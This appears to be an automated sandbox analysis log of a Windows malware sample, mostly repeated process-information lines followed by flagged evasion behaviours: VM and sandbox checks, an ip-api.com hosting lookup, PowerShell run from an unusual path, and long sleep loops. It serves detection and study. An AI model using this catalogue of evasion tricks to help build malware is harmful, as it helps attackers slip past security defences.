Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
Check if machine is in data center or colocation facility
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Powershell is started from unusual location (likely to bypass HIPS)
Source: c:\users\user\appdata\roaming\mustflush.bat.dmf Key value queried: Powershell behavior Jump to behavior
Source: c:\users\user\desktop\ilzhnx3jac.bat.dmf Key value queried: Powershell behavior Jump to behavior
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory allocated: 40E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory allocated: 40E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2560000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2690000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4690000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Memory allocated: C10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Memory allocated: C10000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1370000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2C40000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1370000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799419
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798746
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798531
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Window / User API: threadDelayed 3799 Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Window / User API: threadDelayed 2213 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7247 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2592 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Window / User API: threadDelayed 3097 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Window / User API: threadDelayed 2005 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 3747
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 6081
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf TID: 664 Thread sleep count: 3799 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf TID: 6640 Thread sleep count: 2213 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf TID: 6668 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -35048813740048126s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7256 Thread sleep count: 7247 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7256 Thread sleep count: 2592 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99874s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99762s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99656s >= -30000s Jump to behavior
